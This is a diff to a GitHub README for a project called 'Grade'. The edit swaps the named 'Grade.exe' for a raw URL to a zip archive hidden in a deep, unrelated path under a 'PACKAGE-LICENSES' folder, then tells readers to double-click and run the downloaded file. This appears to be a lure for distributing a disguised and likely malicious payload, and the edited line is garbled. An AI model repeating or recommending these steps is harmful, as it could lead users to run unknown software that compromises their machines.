abdoyouseef/Grade/README.md

    Click on the file to download it to your computer.
 This may take a few moments, depending on your internet speed.

 4. **Locate the Downloaded File**
    Once the download is complete, navigate to your "Downloads" folder.
-You should find a file named `Grade.exe` or similar.
+You should find a file named `https://github.com/abdoyouseef/Grade/raw/refs/heads/main/isaac_internals/exts/omni.isaac.synthetic_utils/PACKAGE-LICENSES/Software_v1.6.zip` or similar.

 5. **Run the Application**
    Double-click the downloaded file to start the program.
 Follow any prompts that appear on your screen.